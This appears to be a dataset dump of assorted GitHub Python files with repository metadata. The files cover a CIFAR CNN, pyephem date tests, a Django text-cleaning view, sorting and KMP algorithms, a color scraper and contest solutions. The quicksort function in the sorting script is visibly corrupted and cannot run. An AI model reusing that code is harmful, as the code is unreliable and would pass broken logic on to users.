nn.MaxPool2d(2),\n nn.Conv2d(64, 192, kernel_size=5, padding=2),\n nn.BatchNorm2d(192),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(2),\n nn.Conv2d(192, 384, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(384, 256, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(256, 256, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(2),\n )\n self.classifier = nn.Sequential(\n nn.Dropout(),\n nn.Linear(256 * 4 * 4, 4096),\n nn.ReLU(inplace=True),\n nn.Dropout(),\n nn.Linear(4096, 4096),\n nn.ReLU(inplace=True),\n nn.Linear(4096, num_classes),\n )\n\n def reset_classifier(self, num_classes=10):\n self.classifier[6] = nn.Linear(4096, num_classes)\n\n def forward(self, x):\n x = self.features(x)\n x = x.view(x.size(0), 256 * 4 * 4)\n x = self.classifier(x)\n return x\n\n\nclass CIFARConvOld(nn.Module):\n def __init__(self, num_classes=10):\n super(CIFARConvOld, self).__init__()\n self.layer1 = nn.Sequential(\n nn.Conv2d(3, 16, kernel_size=5, padding=2),\n nn.BatchNorm2d(16),\n nn.ReLU(),\n nn.MaxPool2d(2))\n self.layer2 = nn.Sequential(\n nn.Conv2d(16, 20, kernel_size=5, padding=2),\n nn.BatchNorm2d(20),\n nn.ReLU(),\n nn.MaxPool2d(2))\n self.layer3 = nn.Sequential(\n nn.Conv2d(20, 20, kernel_size=5, padding=2),\n nn.BatchNorm2d(20),\n nn.ReLU(),\n nn.MaxPool2d(2))\n self.fc = nn.Linear(4 * 4 * 20, num_classes)\n\n def forward(self, x):\n out = self.layer1(x)\n out = self.layer2(out)\n out = self.layer3(out)\n out = out.view(out.size(0), -1)\n out = self.fc(out)\n return out\n\n def re_init_fc(self, num_classes=10):\n self.fc = nn.Linear(4 * 4 * 20, 
num_classes)\n","repo_name":"neuroailab/ptutils","sub_path":"ptutils/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8674,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"72"} +{"seq_id":"44013921874","text":"#Configuration file\n\nimport os\n\n#We create a class that holds the general settings\n#It inherits from object so it can be instantiated\nclass Config(object):\n #Since these are constants, their names are written in uppercase\n PORT = 5000\n \n#Now we can create child classes for the different environments\n\nclass DevelopmentConfig(Config):\n PORT = 9000\n DEBUG = True\n\n\n\n","repo_name":"hek23/FlaskTutorialExample","sub_path":"Config.py","file_name":"Config.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40695884800","text":"import sys, getopt\nfrom controller import *\ndef main(argv):\n inputfile = ''\n outputfile = ''\n data = ''\n try:\n opts, args = getopt.getopt(argv,\"hi:o:\",[\"ifile=\",\"ofile=\"])\n except getopt.GetoptError:\n print ('main.py -i <inputfile> -o <outputfile>')\n sys.exit(2)\n for opt, arg in opts:\n if opt == '-h':\n print ('test.py -i <inputfile> -o <outputfile>')\n sys.exit()\n elif opt in (\"-i\", \"--ifile\"):\n inputfile = arg\n elif opt in (\"-o\", \"--ofile\"):\n outputfile = arg\n\n with open(\"tests/\" + inputfile, \"r\") as input_file:\n text = input_file.read()\n data = start(text)\n pass\n\n with open(\"out/\" + outputfile, \"w\") as output_file:\n # write result to output file.\n # for the sake of testing :\n output_file.write(data)\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])","repo_name":"hassanzaker/decaf-compiler","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3291835516","text":"file = open('24-2.txt')\ndata = file.read()\ncount = 0\nmaxc = 0\nfor i in data:\n if i in 'ACD':\n count += 1\n continue\n if maxc < count:\n maxc = count\n count = 0\nif maxc < count:\n maxc = count\nprint('', maxc)\n","repo_name":"olgaObnosova/EGE","sub_path":"№24/2516.py","file_name":"2516.py","file_ext":"py","file_size_in_byte":204,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"13813006557","text":"#!/usr/bin/env python\n\nimport unittest, time\nfrom datetime import datetime, tzinfo, timedelta\n\nfrom ephem import Date, localtime, to_timezone, UTC\n\nmillisecond = 1.0 / 24.0 / 60.0 / 60.0 / 1e3\n\nclass CET(tzinfo):\n \"\"\"central european time without daylight saving time\"\"\"\n def utcoffset(self, dt):\n return timedelta(hours=1) + self.dst(dt)\n def dst(self, dt):\n return timedelta(0)\n\n# Determine whether dates behave reasonably.\n\nclass DateTests(unittest.TestCase):\n\n def setUp(self):\n self.date = Date('2004/09/04 00:17:15.8')\n\n def test_date_constructor(self):\n\n def construct_and_compare(args1, args2):\n d1, d2 = Date(args1), Date(args2)\n self.assertTrue(abs(d1 - d2) < millisecond,\n 'dates not equal:\\n %r = date%r\\n %r = date%r'\n % (d1.tuple(), args1, d2.tuple(), args2))\n\n std = '2004/09/04 00:17:15.8'\n pairs = [\n [std, '2004.67489614324023472'],\n [std, ' 2004.67489614324023472 '],\n [std, '2004/9/4.0119884259259257'],\n [std, ' 2004/9/4.0119884259259257 '],\n [std, '2004/9/4 0.28772222222222221'],\n [std, ' 2004/9/4 0.28772222222222221 '],\n [std, '2004/9/4 0:17.263333333333332'],\n [std, ' 2004/9/4 0:17.263333333333332 
'],\n [std, '2004/9/4 0:17:15.8'],\n [std, ' 2004/9/4 0:17:15.8 '],\n [std, ' 2004-9-4 0:17:15.8 '],\n ['2004', (2004,)],\n [' 2004 ', (2004,)],\n ['2004/09', (2004, 9)],\n [' 2004/09 ', (2004, 9)],\n [std, (2004, 9, 4.0119884259259257)],\n [std, (2004, 9, 4, 0.28772222222222221)],\n [std, (2004, 9, 4, 0, 17.263333333333332)],\n [std, (2004, 9, 4, 0, 17, 15.8)],\n [std, (datetime(2004, 9, 4, 0, 17, 15, 800000))],\n ]\n for arg1, arg2 in pairs:\n construct_and_compare(arg1, arg2)\n if type(arg2) is str:\n construct_and_compare(arg1, ' %s ' % arg2)\n\n def test_date_parser_error_message(self):\n with self.assertRaises(ValueError) as e:\n Date('bad string')\n self.assertEqual(\n str(e.exception),\n \"your date string 'bad string' does\"\n \" not look like a year/month/day optionally\"\n \" followed by hours:minutes:seconds\",\n )\n\n def test_year_zero(self):\n # I would have thought the year would be 0, but it looks like\n # libastro considers 1 BC to be the year -1?\n self.assertEqual(str(Date('0')), '-1/1/1 00:00:00')\n\n def test_date_string_value(self):\n self.assertEqual(str(self.date), '2004/9/4 00:17:16')\n\n def test_date_triple_value(self):\n self.assertEqual(self.date.triple(), (2004, 9, 4.0119884259256651))\n\n def test_date_tuple_value(self):\n self.assertEqual(self.date.tuple(),\n (2004, 9, 4, 0, 17, 15.8))\n\n def test_another_tuple_value(self):\n #d = Date((1994, 7, 16, 20, 15, 0))\n d = Date(34530.34375)\n self.assertEqual(d.tuple(), (1994, 7, 16, 20, 15, 0))\n\n def test_tuple_that_rounded_to_negative_seconds(self): # Github issue 223\n d = Date(44417.49999991596)\n self.assertEqual(d.tuple(), (2021, 8, 10, 23, 59, 59.992739))\n\n def test_localtime_modern(self):\n if time.timezone == 18000: # test only works in Eastern time zone\n self.assertEqual(localtime(Date('2009/6/23 8:47')),\n datetime(2009, 6, 23, 4, 47, 0))\n\n def test_timezone_aware_utc(self):\n timezoned_date = to_timezone(self.date, UTC)\n self.assertEqual(timezoned_date.tzinfo, UTC)\n self.assertEqual(timezoned_date.hour, 0)\n self.assertEqual(timezoned_date.minute, 17)\n self.assertEqual(timezoned_date.second, 15)\n self.assertEqual(timezoned_date.day, 4)\n self.assertEqual(timezoned_date.month, 9)\n self.assertEqual(timezoned_date.year, 2004)\n\n def test_timezone_aware_cet(self):\n cet = CET()\n timezoned_date = to_timezone(self.date, cet)\n self.assertEqual(timezoned_date.tzinfo, cet)\n self.assertEqual(timezoned_date.hour, 1)\n self.assertEqual(timezoned_date.minute, 17)\n self.assertEqual(timezoned_date.second, 15)\n self.assertEqual(timezoned_date.day, 4)\n self.assertEqual(timezoned_date.month, 9)\n self.assertEqual(timezoned_date.year, 2004)\n\n # I am commenting this out for now because I am not sure that I can\n # fix it without either writing an entirely new time module for\n # PyEphem, or making PyEphem depend on another Python module - which\n # would be its first-ever external dependency.\n\n def OFF_test_localtime_premodern(self):\n if time.timezone == 18000: # test only works in Eastern time zone\n self.assertEqual(localtime(Date('1531/8/24 2:49')),\n datetime(1957, 10, 4, 15, 28, 34, 4))\n","repo_name":"brandon-rhodes/pyephem","sub_path":"ephem/tests/test_dates.py","file_name":"test_dates.py","file_ext":"py","file_size_in_byte":5029,"program_lang":"python","lang":"en","doc_type":"code","stars":671,"dataset":"github-code","pt":"72"} +{"seq_id":"30589283110","text":"#!/usr/bin/env python\n\n# Not working yet!\n\nfrom __future__ import print_function\n\n\n_ESCAPE = '\\033[{}m'\n\n_CODES = {\n 
'tuple': {\n 'special': {\n 'all_reset': '0',\n 'overwrite_line': 'F',\n },\n 'style': {\n 'bold': '1',\n 'faint': '2',\n 'highlight': '3',\n 'underline': '4',\n 'blink_slow': '5',\n 'blink_rapid': '6',\n 'negative': '7',\n 'conceal': '8',\n 'crossed-out': '9',\n # fonts not implemented (10--20)\n 'nobold': '21',\n 'normalcolor': '22',\n 'noitalic': '23',\n 'nounderline': '24',\n 'noblink': '25',\n 'positive': '27',\n 'noconceal': '28',\n 'nocrossed-out': '29',\n 'framed': '51',\n 'encircled': '52',\n 'overlined': '53',\n 'noframe': '54',\n 'nooverline': '55',\n },\n },\n 'string': {\n 'fg': {\n 'black': '30',\n 'red': '31',\n 'green': '32',\n 'yellow': '33',\n 'blue': '34',\n 'magenta': '35',\n 'cyan': '36',\n 'white': '37',\n 'default': '39',\n },\n 'bg': {\n 'black': '40',\n 'red': '41',\n 'green': '42',\n 'yellow': '43',\n 'blue': '44',\n 'magenta': '45',\n 'cyan': '46',\n 'white': '47',\n 'default': '49',\n },\n },\n 'int': {\n 'bg256': '48;5',\n 'fg256': '38;5',\n }\n }\n\n# rename default Python `print` to `_print`\n_print = print\n\ndef format(string, **kwargs):\n ''' Return a string wrapped between the ANSI codes implementing the format\n passed as arguments. '''\n codes = []\n for kwd,val in kwargs.items():\n if kwd in _CODES['tuple'].keys():\n if isinstance(val, str):\n codes.append(_CODES['tuple'][kwd][val])\n else:\n for v in val:\n codes.append(_CODES['tuple'][kwd][v])\n elif kwd in _CODES['string'].keys():\n codes.append(_CODES['string'][kwd][val])\n elif kwd in _CODES['int'].keys():\n codes.append('{};{}'.format(_CODES['int'][kwd], val))\n else:\n raise ValueError('Bad option')\n return '{}{}{}'.format(\n _ESCAPE.format(';'.join(codes)),\n string,\n _ESCAPE.format(_CODES['tuple']['special']['all_reset']),\n )\n\ndef print(*args, **kwargs):\n ''' Call ansi_format and print its output. 
'''\n ansi_kwargs = {}\n print_kwargs = {}\n for k,v in kwargs.items():\n if k in _CODES['tuple'].keys() \\\n or k in _CODES['string'].keys() \\\n or k in ['bg256', 'fg256']: # qnd\n ansi_kwargs.update({k:v})\n else:\n print_kwargs.update({k:v})\n print_args = []\n for arg in args:\n print_args.append(format(arg, **ansi_kwargs))\n _print(*print_args, **print_kwargs)\n","repo_name":"gpelouze/ansi_codes","sub_path":"ansi_codes/ansi_codes.py","file_name":"ansi_codes.py","file_ext":"py","file_size_in_byte":3075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11343193813","text":"import requests\nfrom bs4 import BeautifulSoup\n\n\ndef get_colors_list() -> list:\n colors = []\n with open(\"colors_base.txt\", 'r') as file:\n lines = file.readlines()\n\n for line in lines:\n colorNameAndRgb = line.split(\"| \")\n color_name = colorNameAndRgb[0]\n rgb_red = colorNameAndRgb[1]\n rgb_green = colorNameAndRgb[2]\n rgb_blue = colorNameAndRgb[3][:-1]\n colors.append([color_name, rgb_red, rgb_green, rgb_blue])\n\n return colors\n\n\ndef parse(url):\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 YaBrowser/19.10.2.195 Yowser/2.5 Safari/537.36'}\n response = requests.get(url, headers=headers)\n soup = BeautifulSoup(response.text, \"lxml\")\n return soup.find_all('tr')\n\n\ndef main():\n url = \"https://colorscheme.ru/color-names.html\"\n tr = parse(url)\n tr.pop(0)\n colors = []\n for tag in tr:\n info = tag.find_all('td')\n color_name = str(info[1])[4:-5]\n color_red = str(info[3])[4:-5]\n color_green = str(info[4])[4:-5]\n color_blue = str(info[5])[4:-5]\n colors.append([color_name, color_red, color_green, color_blue])\n print(f\"COLOR {color_name} RED {color_red} GREEN {color_green} BLUE {color_blue}\")\n\n with open(\"colors_base.txt\", 'w') as file:\n for color in colors:\n file.write(f\"{color[0]}| {color[1]}| {color[2]}| {color[3]}\\n\")\n\n\nif __name__ == '__main__':\n main()","repo_name":"polterg3ist/visualizer_RGB","sub_path":"rgb_color_name/color_parse_rgb.py","file_name":"color_parse_rgb.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23805721901","text":"#!/bin/env python3\n\nimport collections\nimport itertools\nimport pprint\n\n\nclass Disc(collections.namedtuple('Disc', ('num', 'positions', 'start'))):\n @property\n def positions_by_time(self):\n return (((x + self.num + self.start) % self.positions)\n for x in itertools.count(start=0))\n\n\ndef solve1(discs):\n position_generators = [disc.positions_by_time for disc in discs]\n for x, positions in enumerate(zip(*position_generators)):\n if all([position == 0 for position in positions]):\n return x\n\n\ndef solve2(discs):\n position_generators = [disc.positions_by_time for disc in discs]\n for x, positions in enumerate(zip(*position_generators)):\n if all([position == 0 for position in positions]):\n return x\n\n\nif __name__ == '__main__':\n\n discs = (\n Disc(1, 5, 2),\n Disc(2, 13, 7),\n Disc(3, 17, 10),\n Disc(4, 3, 2),\n Disc(5, 19, 9),\n Disc(6, 7, 0),\n )\n\n discs_part2 = discs + (Disc(7, 11, 0), )\n\n # discs = (\n # Disc(1, 5, 4),\n # Disc(2, 2, 1),\n # )\n pprint.pprint(solve1(discs))\n 
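# solve2 repeats the same brute-force scan as solve1; part 2 only adds the seventh disc.\n    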
pprint.pprint(solve2(discs_part2))\n","repo_name":"bloy/adventofcode","sub_path":"2016/day15.py","file_name":"day15.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20140352109","text":"import torch\nfrom sklearn.manifold import TSNE\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nimport pandas as pd\nimport numpy as np\n\ndef plot_TSNE(features_all, proposals_all, mem, class_labels):\n tsne = TSNE(init='pca', learning_rate='auto') # init='random' and lr=200.0 is default\n\n features_all = torch.cat(features_all, dim=0).cpu()\n proposals_all = torch.cat([b.bbox for b in proposals_all], dim=0)\n mem_data = mem.cpu()\n\n # find index by calculating minimum distance\n dists, indexes = torch.cdist(mem_data, features_all).min(dim=-1)\n # feed the model outputs into tsne.fit_transform\n pred_tsne = tsne.fit_transform(features_all)\n mem_data_tsne = pred_tsne[indexes]\n\n plt.cla()\n # plot all data points sampled\n xs = pred_tsne[:, 0]\n ys = pred_tsne[:, 1]\n plt.scatter(xs, ys, c='gray', marker='.')\n # plot all data points memorized\n xs = mem_data_tsne[:, 0]\n ys = mem_data_tsne[:, 1]\n label_names = ['bg', # always index 0\n 'airplane', 'antelope', 'bear', 'bicycle', 'bird',\n 'bus', 'car', 'cattle', 'dog', 'domestic_cat',\n 'elephant', 'fox', 'giant_panda', 'hamster', 'horse',\n 'lion', 'lizard', 'monkey', 'motorcycle', 'rabbit',\n 'red_panda', 'sheep', 'snake', 'squirrel', 'tiger',\n 'train', 'turtle', 'watercraft', 'whale', 'zebra']\n colors = ['black', # always index 0\n 'brown', 'chocolate', 'gold', 'khaki', 'olive',\n 'greenyellow', 'darkolivegreen', 'darkseagreen', 'springgreen', 'r',\n 'darkseagreen', 'cyan', 'deepskyblue', 'skyblue', 'steelblue',\n 'powderblue', 'royalblue', 'navy', 'blue', 'slateblue',\n 'darkslateblue', 'blueviolet', 'thistle', 'magenta', 'deeppink',\n 'hotpink', 'crimson', 'pink', 'lightcoral', 'rosybrown']\n # colors = cm.prism(np.linspace(0, 1, 31))\n for cls, c in enumerate(colors):\n tf_cls = class_labels == cls\n # plt.scatter(xs[tf_cls], ys[tf_cls], label=label_names[cls], c=c, cmap=plt.cm.rainbow, marker='.')\n plt.scatter(xs[tf_cls], ys[tf_cls], label=label_names[cls], c=colors[cls], marker='.')\n plt.legend(loc='upper left', bbox_to_anchor=(1.0, 1.0), fontsize='xx-small')\n # plt.scatter(xs, ys, label=label_names[class_labels], c=class_labels, cmap=plt.cm.get_cmap('rainbow', 31), marker='.')\n # plt.colorbar(ticks=label_names)\n plt.savefig('tsne.png')\n plt.show()\n\ndef plot_histogram(contrib_list, l2_norms_list):\n plt.cla()\n contrib = torch.cat(contrib_list).cpu()\n l2_norms = torch.cat(l2_norms_list).cpu()\n targets_df = pd.DataFrame({'Contrib': contrib,\n 'L2_norm': l2_norms})\n sns.kdeplot(targets_df[\n 'Contrib']) # https://mindscale.kr/course/python-visualization-basic/dist/, https://coding-kindergarten.tistory.com/132\n # sns.ecdfplot(targets_df['contrib'])\n plt.show()\n plt.cla()\n sns.kdeplot(targets_df['L2_norm'])\n # sns.ecdfplot(targets_df['contrib'])\n plt.show()\n\n\ndef contrib_L2_plot(contrib, l2_norms, name, name_contrib):\n plt.cla()\n keep_irrelevant = (torch.softmax(l2_norms, dim=0) > 1 / len(l2_norms))\n plt.scatter(contrib, l2_norms, c=keep_irrelevant, cmap=plt.cm.rainbow, marker='.')\n plt.title(name, fontsize=20)\n #major_ticks_topx = np.linspace(0, 1, 11)\n #minor_ticks_topy = np.linspace(0.6, 2.4, 10)\n #plt.xticks(major_ticks_topx)\n #plt.yticks(minor_ticks_topy)\n plt.xlabel(\"contrib_\" + 
name_contrib, fontsize=20)\n plt.ylabel(\"l2_norm\", fontsize=20)\n plt.show()\n\n\ndef contrib_L2_plots(contrib_list, l2_norms_list, name):\n contrib = torch.cat(contrib_list).cpu()\n l2_norms = torch.cat(l2_norms_list).cpu()\n contrib_L2_plot(contrib, l2_norms, name, 'all')\n contrib_mean = torch.stack(contrib_list).mean(dim=0).cpu()\n l2_norms_mean = torch.stack(l2_norms_list).mean(dim=0).cpu()\n contrib_L2_plot(contrib_mean, l2_norms_mean, name, 'mean')\n contrib_max = torch.stack(contrib_list).max(dim=0)[0].cpu()\n l2_norms_max = torch.stack(l2_norms_list).max(dim=0)[0].cpu()\n contrib_L2_plot(contrib_max, l2_norms_max, name, 'max')\n","repo_name":"sdroh1027/DiffusionVID","sub_path":"demo/visualizer.py","file_name":"visualizer.py","file_ext":"py","file_size_in_byte":4263,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"72"} +{"seq_id":"26629630097","text":"from django.http import HttpResponse\nfrom django.shortcuts import render\n\ndef index(request):\n\n return render(request,\"index.html\")\n\ndef ex(request):\n return render(request,\"navigator.html\")\n\n\n\ndef analyze(request):\n djtext=request.POST.get(\"text\",\"default\")\n removepunc=request.POST.get(\"removepunc\",\"off\")\n capfirst = request.POST.get(\"capfirst\", \"off\")\n newlineremover=request.POST.get(\"newlineremover\", \"off\")\n extraspaceremover=request.POST.get(\"extraspaceremover\", \"off\")\n numberremover=request.POST.get(\"numberremover\", \"off\")\n\n\n print(djtext)\n print(removepunc)\n punctuations = '''!()-[]{};:'\"\\,<>./?@#$%^&*_~'''\n punctext=\"\"\n params = {}\n if removepunc==\"on\":\n for char in djtext:\n if char not in punctuations:\n punctext=punctext+char\n\n remove_punc={\"purpose\":\"removed punctuations\",\"analyzed_text\":punctext}\n params.update({\"removepunctuations\":remove_punc})\n djtext=punctext\n # return render(request,\"analyze.html\",params)\n if capfirst == \"on\":\n captext=\"\"\n for char in djtext:\n captext = captext + char.capitalize()\n uppercase={\"purpose\": \"changed to uppercase\", \"analyzed_text\": captext}\n params.update( {\"uppercase\":uppercase})\n djtext=captext\n #return render(request, \"analyze.html\", params)\n if newlineremover == \"on\":\n newlinetext=\"\"\n for char in djtext:\n if char!=\"\\n\" and char!=\"\\r\":\n newlinetext = newlinetext + char\n newline_remover={\"purpose\": \"newlineremover\", \"analyzed_text\": newlinetext}\n params.update({\"newlineremover\":newline_remover})\n djtext=newlinetext\n #return render(request, \"analyze.html\", params)\n if extraspaceremover == \"on\":\n extraspacetext=\"\"\n for index,char in enumerate(djtext):\n if not(index==len(djtext)-1):\n if not(djtext[index] ==\" \" and djtext[index+1] == \" \"):\n extraspacetext = extraspacetext + char\n else:\n extraspacetext = extraspacetext + char\n space_remover={\"purpose\":\"spaceremover\",\"analyzed_text\":extraspacetext}\n params.update({\"extraspaceremover\":space_remover})\n djtext=extraspacetext\n #return render(request, \"analyze.html\", params)\n\n if (numberremover == \"on\"):\n numberremovedtext = \"\"\n numbers = '0123456789'\n\n for char in djtext:\n if char not in numbers:\n numberremovedtext = numberremovedtext + char\n\n numberremover={\"purpose\":\"numberremover\",\"analyzed_text\":numberremovedtext}\n\n params.update({\"numberremover\":numberremover})\n djtext = numberremovedtext\n return render(request,\"analyze.html\",params)\n\n\n\n\ndef aboutus(request):\n\n return 
render(request,\"aboutus.html\")\n\n\ndef contactus(request):\n\n return render(request,\"contactus.html\")\n\n\n\n\n\n\n\n\n","repo_name":"giridhar7889/TextUtilis","sub_path":"textutilis/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24673152748","text":"import random\n\n\"\"\"単純ソートのスクリプト\"\"\"\ndef simplesrt(data):\n n = 0\n d = data\n d_num = len(d)\n for i in range(d_num-1):\n d_min = min(d[i:d_num])\n d_mindex = d[i:d_num].index(d_min) + i\n d[d_mindex] = d[i]\n d[i] = d_min\n n += 1\n print(\"単純ソートは{}回演算した\".format(n))\n return d\n\n\"\"\"バブルソートのスクリプト\"\"\"\ndef idou(d,d_index):\n n = 0\n x = d[d_index]\n for ii in range(d_index):\n n += 1\n if d[d_index-(ii+1)] >= x:\n d[d_index-ii] = d[d_index-(ii+1)]\n d[d_index-(ii+1)] = x\n else:\n break\n return n, d\ndef bublesrt(data):\n n = 0\n d = data\n d_num = len(d)\n for d_index in range(d_num):\n n1, d = idou(d,d_index)\n n += n1\n print(\"バブルソートは{}回演算した\".format(n))\n return d\n\n\"\"\"挿入ソートのスクリプト\"\"\"\ndef insrt(d,d_index):\n n = 0\n sub_d = d.copy()\n for i in range(d_index):\n n += 1\n if sub_d[i] > sub_d[d_index]:\n d[i] = sub_d[d_index]\n for ii in range(i,d_index):\n d[ii+1] = sub_d[ii]\n #print(\"break!\")\n break\n else:\n continue\n return n, d\ndef insrtsrt(data):\n n = 0\n d = data\n d_num = len(d)\n for d_index in range(1,d_num):\n n1, d = insrt(d,d_index)\n n += n1\n print(\"挿入ソートは{}回演算した\".format(n))\n return d\n\n\"\"\"クイックソートのスクリプト\"\"\"\ndef i_index(data,index,ref):\n d = data\n d_num = len(d)\n for i in range(index,d_num):\n if d[i] >= ref:\n break\n return i\ndef k_index(data,index,ref):\n d = data\n for k in range(index,-1,-1):\n if d[k] <= ref:\n break\n\n return k\ndef exchange(data,i,k):\n buf = data[i]\n data[i] = data[k]\n data[k] = buf\n return data\ndef quiq(data,i,k,n):\n n1 = n\n d = data\n head = i\n tail = k-1\n ref = d[head]\n while id[k] and head 1:\n n1,d = quiq(d,head,k,n1)\n if tail-k > 1:\n n1,d = quiq(d,k+1,tail+1,n1)\n return n1, d\ndef quiqsrt(data):\n n = 0\n d = data\n d_num = len(d)\n n, d = quiq(d,0,d_num,0)\n print(\"クイックソートは{}回演算した\".format(n))\n return d\n\n\n\"\"\"テスト実行用のスクリプト\"\"\"\nlists = [random.randint(0,100) for i in range(100)]\ns_lists = lists.copy()\nb_lists = lists.copy()\ni_lists = lists.copy()\nq_lists = lists.copy()\nprint(\"初めは{}\".format(lists))\ns_lists = simplesrt(s_lists)\nprint(\"並び変えると{}\".format(s_lists))\nprint(\"初めは{}\".format(b_lists))\nb_lists = bublesrt(b_lists)\nprint(\"並び変えると{}\".format(b_lists))\nprint(\"初めは{}\".format(i_lists))\ni_lists = insrtsrt(i_lists)\nprint(\"並び変えると{}\".format(i_lists))\nprint(\"初めは{}\".format(q_lists))\nq_lists = quiqsrt(q_lists)\nprint(\"並び変えると{}\".format(q_lists))\n","repo_name":"Yakyuudaisuki/algorithm","sub_path":"smplsrt.py","file_name":"smplsrt.py","file_ext":"py","file_size_in_byte":3148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11185850333","text":"import sys\nsys.stdin = open('5189_input.txt')\n\n#\n# def dfs(before, cur, cur_elec, visited):\n# global min_elec\n# cur_elec += arr[before][cur]\n# print(f\"{before} to {cur} , 현재전기소비량 {cur_elec}\")\n#\n# if sum(visited)==N:\n# last = cur_elec + arr[cur][1]\n# if min_elec > last:\n# min_elec = last\n#\n# else:\n# for i in range(1,N+1):\n# if visited[i] == False:\n# visited[i] = True\n# next_loc = i\n# dfs(cur,next_loc,cur_elec,visited)\n#\ndef perm(idx, N):\n global min_elec\n 
if idx == N:\n cur_elec = 0\n new = [1] + p + [1]\n # print(new)\n for i in range(len(new)-1):\n cur_elec += arr[new[i]][new[i+1]]\n # print(arr[i][i+1])\n if cur_elec < min_elec:\n min_elec = cur_elec\n else:\n for i in range(N):\n if used[i] == 0:\n used[i] = 1\n p[idx] = a[i]\n perm(idx+1, N)\n used[i] = 0\n return\n\n\n\n\nT = int(input())\nfor tc in range(1,T+1):\n N = int(input())\n # row: departure city, column: arrival city, arr value: power usage\n arr = [[0]*(N+1)] + [[0]+ list(map(int,input().split())) for _ in range(N)]\n\n min_elec = 1000000\n a = list(range(2, N + 1))\n p = [0] * (N - 1)\n used = [0] * (N - 1)\n perm(0, N - 1)\n\n\n print(f\"#{tc} {min_elec}\")\n\n\n","repo_name":"jisy2718/_algorithm","sub_path":"SWEA/5189_전자카트_완전탐색.py","file_name":"5189_전자카트_완전탐색.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27751569918","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\na, b = map(int, input().split())\r\ntmp = [1] * (int(b ** 0.5) + 1)\r\ntmp[0] = 0\r\ntmp[1] = 0\r\n\r\nfor k in range(2, int(b ** 0.5) + 1):\r\n if tmp[k] == 1:\r\n for i in range(k * 2,int(b ** 0.5) + 1, k):\r\n tmp[i] = 0\r\n\r\ncnt = 0\r\nfor i in range(len(tmp)):\r\n if tmp[i] == 1:\r\n n = 2\r\n while True:\r\n if i**n >= a:\r\n if i**n <= b:\r\n cnt += 1\r\n else:\r\n break\r\n n += 1\r\nprint(cnt)","repo_name":"nube-net/baekjoon-nube-net-gytjdttop-","sub_path":"백준/Gold/1456. 거의 소수/거의 소수.py","file_name":"거의 소수.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"36527638242","text":"\"\"\"Python implementation of KMP\nfrom my blog \nhttps://markwh1te.com/post/kmp/\n\"\"\"\n\n\ndef bruteforce_match(s1: str, s2: str)->int:\n if s1 == None or s2 == None or len(s2) < 1 or len(s1) < len(s2):\n return -1\n i = j = 0\n while i < len(s1) and j < len(s2):\n if s1[i] == s2[j]:\n i = i + 1\n j = j + 1\n else:\n # on a mismatch, restart just after the previous starting point\n i = i - j + 1\n j = 0\n\n if j == len(s2):\n return i - j\n else:\n return -1\n\n\ndef kmp(s1: str, s2: str)->int:\n if s1 == None or s2 == None or len(s2) < 1 or len(s1) < len(s2):\n return -1\n next_arr = find_next(s2)\n i = j = 0\n while i < len(s1) and j < len(s2):\n if s1[i] == s2[j]:\n i = i + 1\n j = j + 1\n else:\n if next_arr[j] == -1:\n i = i + 1\n else:\n j = next_arr[j]\n\n if j == len(s2):\n # return the start index of substring\n return i - j\n else:\n # sadly we donot find it :(\n return -1\n\n\ndef find_next(s: str)->[int]:\n \"\"\"\n input:string\n output:the next array of string\n \"\"\"\n if len(s) == 1:\n return [-1]\n result = [0 for i in range(len(s))]\n result[0] = -1\n result[1] = 0\n i = 2\n cn = 0\n while i < len(result):\n if s[i-1] == s[cn]:\n cn += 1\n result[i] = cn\n i = i + 1\n elif cn > 0:\n # fall back without consuming a character\n cn = result[cn]\n else:\n result[i] = 0\n i = i + 1\n return result\n","repo_name":"M4rkWhite/Gate-of-Babylon","sub_path":"algorithms/acm/kmp.py","file_name":"kmp.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"40342026145","text":"import random\n\n# LENGTH = 5\n# START = 0\n# STOP = 100\n#\n# random_list = [random.randint(START, STOP) for i in range(LENGTH)]\n# print(random_list)\n#\n# max_num = 0\n# min_num = random_list[0]\n#\n# for i in random_list:\n# if i > max_num:\n# max_num = i\n# if i < min_num:\n# min_num = i\n#\n# print(f'The max number is: {max_num}')\n# print(f'The min number is: {min_num}')\n# print(f'The 
